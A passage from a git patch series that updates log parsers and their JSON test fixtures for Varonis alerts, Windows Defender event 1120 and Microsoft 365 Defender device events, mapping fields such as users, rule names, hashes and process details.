@@ -63,7 +63,7 @@ stages:
           event.kind: "alert"
           event.category: >
             [
-              {% if parsed_event.message.cs1 != null %}"email"{% else %}"network"{% endif %}
+              {% if parsed_event.message.cs1 != null %}"email"{% elif parsed_event.message.AlertCategory == "Intrusion" %}"intrusion_detection"{% else %}"network"{% endif %}
             ]
           event.type: ["info"]
 
@@ -76,19 +76,34 @@ stages:
   set_cef_extension_fields:
     actions:
       - set:
+          destination.ip: "{{parsed_event.message.DestinationDip}}"
+          destination.user.name: "{{parsed_event.message.AffectedObjectSAM}}"
+          destination.user.domain: "{{parsed_event.message.AffectedObjectDomain}}"
+
           event.dataset: "{{parsed_event.message.cat}}"
           event.action: "{{parsed_event.message.act}}"
           event.end: "{{parse_end_date.date}}"
 
           rule.name: "{{parsed_event.message.cn1}}"
-          rule.description: "{{parsed_event.message.cs2}}"
+          rule.description: "{{parsed_event.message.DescriptionRule or parsed_event.message.cs2}}"
 
-          user.name: "{{parsed_event.message.duser}}"
+          user.name: "{{parsed_event.message.duser.split('\\\\')[-1]}}"
           host.name: "{{parsed_event.message.dhost}}"
 
           file.path: "{{parsed_event.message.filePath}}"
           file.name: "{{parsed_event.message.fname}}"
+
           source.domain: "{{parsed_event.message.dvchost}}"
+          source.user.name: "{{parsed_event.message.ActingObjectSAM}}"
+          source.user.domain: "{{parsed_event.message.ActingObjectDomaineName}}"
+
+      - set:
+          rule.name: "{{parsed_event.message.cs2}}"
+        filter: "{{parsed_event.message.cs2Label == 'RuleName'}}"
+
+      - set:
+          rule.id: "{{parsed_event.message.cn1}}"
+        filter: "{{parsed_event.message.cn1Label == 'RuleID' and parsed_event.message.cn1 | int > 0}}"
 
       - set:
           event.severity: "{{parsed_event.message.Severity}}"
@@ -105,6 +120,10 @@ stages:
           event.url: "{{parsed_event.message.cs4}}"
         filter: "{{parsed_event.message.cs4 != null}}"
 
+      - set:
+          user.domain: "{{parsed_event.message.duser.split('\\\\')[0]}}"
+        filter: "{{parsed_event.message.duser.split('\\\\') | length > 1}}"
+
       - set:
           email.attachments: >
             [
@@ -124,3 +143,6 @@ stages:
           varonis.datalert.outcome: "{{parsed_event.message.outcome}}"
           varonis.datalert.num_events: "{{parsed_event.message.cnt}}"
           varonis.datalert.id: "{{parsed_event.message.externalId}}"
+          varonis.datalert.destination.device: "{{parsed_event.message.DestinationDeviceName}}"
+          varonis.datalert.description: "{{parsed_event.message.DescriptionAlert}}"
+          varonis.datalert.rule.storyline: "{{parsed_event.message.RuleStoryline}}"
diff --git a/Varonis/varonis-data-security/tests/test_intrusion.json b/Varonis/varonis-data-security/tests/test_intrusion.json
new file mode 100644
index 000000000..ec01ef401
--- /dev/null
+++ b/Varonis/varonis-data-security/tests/test_intrusion.json
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "message": "0|Varonis Inc.|DatAdvantage|8.6.32|5011|User locked out|3|rt=Oct 14 2024 11:33:57 cat=Alert cs2=Lockout: Multiple account lock-out events cs2Label=RuleName cn1=136 cn1Label=RuleID end=Oct 14 2024 11:33:51 duser=COMPANY.LOCAL\\John Doe dhost=Host filePath=COMPANY.LOCAL/Company/arborescence/John DOE fname=John DOE act=User locked out dvchost= dvc= outcome=Success msg= cs3= cs3Label=AttachmentName cs4=http://srv-gar-vardsp/DatAdvantage/#/app/analytics/entity/Alert/12345678-abcd-1234-5678-abcdef012345 cs4Label=ClientAccessType deviceCustomDate1= fileType= cs1= cs1Label=MailRecipient suser= cs5= cs5Label=MailboxAccessType cnt=5 cs6= cs6Label=ChangedPermissions oldFilePermission= filePermission= dpriv= start=Oct 14 2024 11:29:48 DescriptionRule=Several account lock-out events occurred within a short time frame. This may indicate a brute-force attack aimed at stealing users' credentials, or causing a denial-of-service for multiple users. DescriptionAlert= RuleStoryline= Path=COMPANY.LOCAL/Company/arborescence/John DOE ActingObjectSAM=doe_j ActingObjectDomaineName=COMPANY.LOCAL AlertCategory=Intrusion AffectedObjectSAM=doe_j AffectedObjectDomain=COMPANY.LOCAL DestinationDip= DestinationDeviceName=",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Varonis Data Security",
+        "dialect_uuid": "7b75d498-4a65-4d44-aa81-31090d723a60"
+      }
+    }
+  },
+  "expected": {
+    "message": "0|Varonis Inc.|DatAdvantage|8.6.32|5011|User locked out|3|rt=Oct 14 2024 11:33:57 cat=Alert cs2=Lockout: Multiple account lock-out events cs2Label=RuleName cn1=136 cn1Label=RuleID end=Oct 14 2024 11:33:51 duser=COMPANY.LOCAL\\John Doe dhost=Host filePath=COMPANY.LOCAL/Company/arborescence/John DOE fname=John DOE act=User locked out dvchost= dvc= outcome=Success msg= cs3= cs3Label=AttachmentName cs4=http://srv-gar-vardsp/DatAdvantage/#/app/analytics/entity/Alert/12345678-abcd-1234-5678-abcdef012345 cs4Label=ClientAccessType deviceCustomDate1= fileType= cs1= cs1Label=MailRecipient suser= cs5= cs5Label=MailboxAccessType cnt=5 cs6= cs6Label=ChangedPermissions oldFilePermission= filePermission= dpriv= start=Oct 14 2024 11:29:48 DescriptionRule=Several account lock-out events occurred within a short time frame. This may indicate a brute-force attack aimed at stealing users' credentials, or causing a denial-of-service for multiple users. DescriptionAlert= RuleStoryline= Path=COMPANY.LOCAL/Company/arborescence/John DOE ActingObjectSAM=doe_j ActingObjectDomaineName=COMPANY.LOCAL AlertCategory=Intrusion AffectedObjectSAM=doe_j AffectedObjectDomain=COMPANY.LOCAL DestinationDip= DestinationDeviceName=",
+    "event": {
+      "action": "User locked out",
+      "category": [
+        "intrusion_detection"
+      ],
+      "dataset": "Alert",
+      "end": "2024-10-14T11:33:51Z",
+      "kind": "alert",
+      "severity": 3,
+      "type": [
+        "info"
+      ],
+      "url": "http://srv-gar-vardsp/DatAdvantage/#/app/analytics/entity/Alert/12345678-abcd-1234-5678-abcdef012345"
+    },
+    "@timestamp": "2024-10-14T11:29:48Z",
+    "destination": {
+      "user": {
+        "domain": "COMPANY.LOCAL",
+        "name": "doe_j"
+      }
+    },
+    "file": {
+      "name": "John DOE",
+      "path": "COMPANY.LOCAL/Company/arborescence/John DOE"
+    },
+    "host": {
+      "name": "Host"
+    },
+    "observer": {
+      "product": "DatAdvantage",
+      "vendor": "Varonis Inc.",
+      "version": "8.6.32"
+    },
+    "related": {
+      "user": [
+        "John Doe",
+        "doe_j"
+      ]
+    },
+    "rule": {
+      "description": "Several account lock-out events occurred within a short time frame. This may indicate a brute-force attack aimed at stealing users' credentials, or causing a denial-of-service for multiple users.",
+      "id": "136",
+      "name": "Lockout: Multiple account lock-out events"
+    },
+    "source": {
+      "user": {
+        "domain": "COMPANY.LOCAL",
+        "name": "doe_j"
+      }
+    },
+    "user": {
+      "domain": "COMPANY.LOCAL",
+      "name": "John Doe"
+    },
+    "varonis": {
+      "datalert": {
+        "num_events": 5,
+        "outcome": "Success"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Varonis/varonis-data-security/tests/test_network_alert.json b/Varonis/varonis-data-security/tests/test_network_alert.json
index fdb79d78f..c60398e8c 100644
--- a/Varonis/varonis-data-security/tests/test_network_alert.json
+++ b/Varonis/varonis-data-security/tests/test_network_alert.json
@@ -25,7 +25,7 @@
     "rule": {
       "description": "SomeRule",
       "id": "666",
-      "name": "Some rule description"
+      "name": "SomeRule"
     },
     "varonis": {
       "datalert": {

From 08cd33001ba533daf30c207cb466bc6be0fa3b47 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 17 Oct 2024 14:11:27 +0200
Subject: [PATCH 161/317] fix/Windows: Addition of hash field for event 1120

---
 Windows/windows/ingest/parser.yml        | 32 ++++++----
 Windows/windows/tests/defender_1120.json | 74 ++++++++++++++++++++++++
 2 files changed, 96 insertions(+), 10 deletions(-)
 create mode 100644 Windows/windows/tests/defender_1120.json

diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 9c8ae969f..5709d4345 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -40,6 +40,17 @@ pipeline:
         value_sep: "="
         item_sep: ","
 
+  - name: parsed_hashes_kv_2
+    description: "Extract fields from hashes field"
+    filter: "{{json.event.Hashes != null or json.event.Hash != null}}"
+    external:
+      name: kv.parse-kv
+      properties:
+        input_field: "{{json.event.Hashes or json.event.Hash}}"
+        output_field: result
+        value_sep: ":"
+        item_sep: ";"
+
   - name: parsed_message_xml
     # issue #31452
     filter: "{{json.event.Message != null and '<?xml' in json.event.Message}}"
@@ -179,9 +190,9 @@ stages:
           dll.name: "{{json.event.OriginalFileName}}"
 
       - set:
-          dll.hash.imphash: "{{parsed_hashes_kv.result.IMPHASH}}"
-          dll.hash.md5: "{{parsed_hashes_kv.result.MD5}}"
-          dll.hash.sha256: "{{parsed_hashes_kv.result.SHA256}}"
+          dll.hash.imphash: "{{parsed_hashes_kv.result.IMPHASH or parsed_hashes_kv_2.result.IMPHASH}}"
+          dll.hash.md5: "{{parsed_hashes_kv.result.MD5 or parsed_hashes_kv_2.result.MD5}}"
+          dll.hash.sha256: "{{parsed_hashes_kv.result.SHA256 or parsed_hashes_kv_2.result.SHA256}}"
 
   set_file:
     actions:
@@ -207,9 +218,9 @@ stages:
         filter: "{{json.event.SourceName == 'Microsoft-Windows-PowerShell'}}"
 
       - set:
-          file.hash.imphash: "{{parsed_hashes_kv.result.IMPHASH}}"
-          file.hash.md5: "{{parsed_hashes_kv.result.MD5}}"
-          file.hash.sha256: "{{parsed_hashes_kv.result.SHA256}}"
+          file.hash.imphash: "{{parsed_hashes_kv.result.IMPHASH or parsed_hashes_kv_2.result.IMPHASH}}"
+          file.hash.md5: "{{parsed_hashes_kv.result.MD5 or parsed_hashes_kv_2.result.MD5}}"
+          file.hash.sha256: "{{parsed_hashes_kv.result.SHA256 or parsed_hashes_kv_2.result.SHA256}}"
         filter: "{{json.event.EventID in (15,23,24,28) }}"
 
       - set:
@@ -509,10 +520,10 @@ stages:
   hashes:
     actions:
       - set:
-          process.hash.imphash: "{{parsed_hashes_kv.result.IMPHASH}}"
-          process.hash.sha1: "{{parsed_hashes_kv.result.SHA1}}"
-          process.hash.md5: "{{parsed_hashes_kv.result.MD5}}"
-          process.hash.sha256: "{{parsed_hashes_kv.result.SHA256}}"
+          process.hash.imphash: "{{parsed_hashes_kv.result.IMPHASH or parsed_hashes_kv_2.result.IMPHASH}}"
+          process.hash.sha1: "{{parsed_hashes_kv.result.SHA1 or parsed_hashes_kv_2.result.SHA1}}"
+          process.hash.md5: "{{parsed_hashes_kv.result.MD5 or parsed_hashes_kv_2.result.MD5}}"
+          process.hash.sha256: "{{parsed_hashes_kv.result.SHA256 or parsed_hashes_kv_2.result.SHA256}}"
         filter: "{{json.event.EventID not in (7, 15, 23, 24, 26) }}"
 
   process_ids:
@@ -624,6 +635,7 @@ stages:
           1105: Event log automatic backup
           1108: The event logging service encountered an error
           1116: The antimalware platform detected malware or other potentially unwanted software.
+          1120: Microsoft Defender Antivirus deduced the hashes for a threat resource.
           4104: Creating Scriptblock text
           4608: Windows is starting up
           4609: Windows is shutting down
diff --git a/Windows/windows/tests/defender_1120.json b/Windows/windows/tests/defender_1120.json
new file mode 100644
index 000000000..26359dd41
--- /dev/null
+++ b/Windows/windows/tests/defender_1120.json
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Windows",
+        "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
+      }
+    },
+    "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": \"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}"
+  },
+  "expected": {
+    "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": \"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}",
+    "event": {
+      "code": "1120",
+      "provider": "Microsoft-Windows-Windows Defender"
+    },
+    "action": {
+      "id": 1120,
+      "name": "Microsoft Defender Antivirus deduced the hashes for a threat resource.",
+      "properties": {
+        "AccountName": "SYSTEM",
+        "AccountType": "User",
+        "Domain": "NT AUTHORITY",
+        "EventType": "INFO",
+        "Keywords": "-9223372036854775808",
+        "OpcodeValue": 0,
+        "ProviderGuid": "{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}",
+        "Severity": "INFO",
+        "SourceName": "Microsoft-Windows-Windows Defender",
+        "Task": 0
+      },
+      "record_id": 6255,
+      "type": "Microsoft-Windows-Windows Defender/Operational"
+    },
+    "host": {
+      "hostname": "host",
+      "name": "host"
+    },
+    "log": {
+      "hostname": "host",
+      "level": "info"
+    },
+    "os": {
+      "family": "windows",
+      "platform": "windows"
+    },
+    "process": {
+      "hash": {
+        "sha1": "ea2d464a69fd953a98decd2f9c0189d682c54169"
+      },
+      "id": 5864,
+      "pid": 5864,
+      "thread": {
+        "id": 11064
+      }
+    },
+    "related": {
+      "hash": [
+        "ea2d464a69fd953a98decd2f9c0189d682c54169"
+      ],
+      "hosts": [
+        "host"
+      ],
+      "user": [
+        "SYSTEM"
+      ]
+    },
+    "user": {
+      "domain": "NT AUTHORITY",
+      "id": "S-1-2-3",
+      "name": "SYSTEM"
+    }
+  }
+}
\ No newline at end of file

From cf43f0e846f5df3ef6c68e453bbfc5bb9b837c57 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 17 Oct 2024 14:13:15 +0200
Subject: [PATCH 162/317] Fix on linting

---
 Windows/windows/tests/defender_1120.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Windows/windows/tests/defender_1120.json b/Windows/windows/tests/defender_1120.json
index 26359dd41..072b3443f 100644
--- a/Windows/windows/tests/defender_1120.json
+++ b/Windows/windows/tests/defender_1120.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": \"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Windows",
         "dialect_uuid": "9281438c-f7c3-4001-9bcc-45fd108ba1be"
       }
-    },
-    "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": \"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}"
+    }
   },
   "expected": {
     "message": "{\"EventTime\": \"2024-08-13 00:27:56\",\"Hostname\": \"host\",\"Keywords\": -9223372036854775808,\"EventType\": \"INFO\",\"SeverityValue\": 2,\"Severity\": \"INFO\",\"EventID\": 1120,\"SourceName\": \"Microsoft-Windows-Windows Defender\",\"ProviderGuid\": \"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}\",\"Version\": 0,\"Task\": 0,\"OpcodeValue\": 0,\"RecordNumber\": 6255,\"ActivityID\": \"{12345678-ABCD-1234-EF01-123456ABCDEF}\",\"ProcessID\": 5864,\"ThreadID\": 11064,\"Channel\": \"Microsoft-Windows-Windows Defender/Operational\",\"Domain\": \"NT AUTHORITY\",\"AccountName\": \"SYSTEM\",\"UserID\": \"S-1-2-3\",\"AccountType\": \"User\",\"Product Name\": \"Microsoft Defender Antivirus\",\"Product Version\": \"4.18.24060.7\",\"Threat resource path\": \"C:\\\\Users\\\\JOHNDOE\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Cache\\\\Cache_Data\\\\f_010213\",\"Hashes\": \"SHA1:ea2d464a69fd953a98decd2f9c0189d682c54169;\",\"EventReceivedTime\": \"2024-08-13 00:51:17\",\"SourceModuleName\": \"in\",\"SourceModuleType\": \"im_msvistalog\"}",

From 600c4aaa9ec3774c37c3d084f9426a36989a1232 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 17 Oct 2024 16:12:08 +0200
Subject: [PATCH 163/317] fix(Microsoft): revert changes on the process.*
 fields about AdvancedHunting-DeviceEvents and
 AdvancedHunting-DeviceProcessEvents events.

handling process.* fields for these events is more complex because the action, in the event, may influence the result.
---
 .../microsoft-365-defender/_meta/fields.yml   | 24 --------
 .../microsoft-365-defender/ingest/parser.yml  | 56 ++++++-------------
 .../tests/test_device_event.json              | 37 ++++++++----
 .../tests/test_device_process_created.json    |  8 +--
 .../tests/test_device_process_events.json     | 35 ++++++------
 .../tests/test_local_ip.json                  | 39 +++++++++----
 .../tests/test_process_error.json             | 33 +++++------
 7 files changed, 106 insertions(+), 126 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml
index 89168f3cf..3a95175de 100644
--- a/Microsoft/microsoft-365-defender/_meta/fields.yml
+++ b/Microsoft/microsoft-365-defender/_meta/fields.yml
@@ -816,30 +816,6 @@ microsoft.defender.threat.types:
   name: microsoft.defender.threat.types
   type: keyword
 
-process.parent.user.domain:
-  description: Domain of the account that ran the parent process responsible for the
-    event
-  name: process.parent.user.domain
-  type: keyword
-
-process.parent.user.email:
-  description: User principal name (UPN) of the account that ran the parent process
-    responsible for the event
-  name: process.parent.user.email
-  type: keyword
-
-process.parent.user.id:
-  description: Security Identifier (SID) of the account that ran the parent process
-    responsible for the event
-  name: process.parent.user.id
-  type: keyword
-
-process.parent.user.name:
-  description: User name of the account that ran the parent process responsible for
-    the event
-  name: process.parent.user.name
-  type: keyword
-
 process.user.domain:
   description: Domain of the account that ran the process responsible for the event
   name: process.user.domain
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index d1793d4b2..f22b21ce1 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -126,6 +126,22 @@ stages:
           host.os.full: "{{json_event.message.properties.OSPlatform}}"
           host.os.version: "{{json_event.message.properties.OSVersion}}"
           host.type: "{{json_event.message.properties.DeviceType}}"
+          process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
+          process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
+          process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
+          process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
+          process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
+          process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
+          process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
+          process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
+          process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
+          process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
+          process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
+          process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
+          process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
+          process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
+          process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
+          process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
           registry.data.type: "{{json_event.message.properties.RegistryValueType}}"
           registry.key: "{{json_event.message.properties.RegistryKey}}"
           registry.value: "{{json_event.message.properties.RegistryValueName}}"
@@ -243,46 +259,6 @@ stages:
       - set:
           network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}"
         filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}'
-
-      - set:
-          process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}"
-          process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}"
-          process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
-          process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}"
-          process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
-          process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}"
-          process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}"
-          process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}"
-          process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}"
-          process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
-          process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
-          process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
-          process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
-          process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}"
-          process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}"
-          process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}"
-        filter: '{{ json_event.message.get("category") not in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}'
-
-      - set:
-          process.name: "{{json_event.message.properties.FileName}}"
-          process.executable: "{{json_event.message.properties.FolderPath}}"
-          process.command_line: "{{json_event.message.properties.ProcessCommandLine}}"
-          process.start: "{{json_event.message.properties.ProcessCreationTime}}"
-          process.pid: "{{json_event.message.properties.ProcessId}}"
-          process.hash.md5: "{{json_event.message.properties.MD5}}"
-          process.hash.sha1: "{{json_event.message.properties.SHA1}}"
-          process.hash.sha256: "{{json_event.message.properties.SHA256}}"
-          process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}"
-          process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}"
-          process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName}}"
-          process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}"
-          process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}"
-          process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}"
-          process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}"
-          process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}"
-          process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}"
-          process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}"
-        filter: '{{json_event.message.get("category") in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}'
   set_alert_evidence_fields:
     actions:
       - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event.json b/Microsoft/microsoft-365-defender/tests/test_device_event.json
index a1f8cc8d4..ca708b0ed 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_event.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_event.json
@@ -53,22 +53,35 @@
         "--sandboxed-process-id=2",
         "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\""
       ],
+      "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+      "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
+      "hash": {
+        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
+        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
+        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
+      },
+      "name": "software_reporter_tool.exe",
       "parent": {
-        "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-        "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
         "name": "software_reporter_tool.exe",
-        "pid": 1664,
-        "start": "2022-09-01T06:56:23.788784Z",
-        "user": {
-          "domain": "intranet",
-          "email": "user@example.org",
-          "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
-          "name": "group1"
-        },
-        "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
-      }
+        "pid": 15532,
+        "start": "2022-09-01T06:56:23.595229Z"
+      },
+      "pid": 1664,
+      "start": "2022-09-01T06:56:23.788784Z",
+      "user": {
+        "domain": "intranet",
+        "email": "user@example.org",
+        "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
+        "name": "group1"
+      },
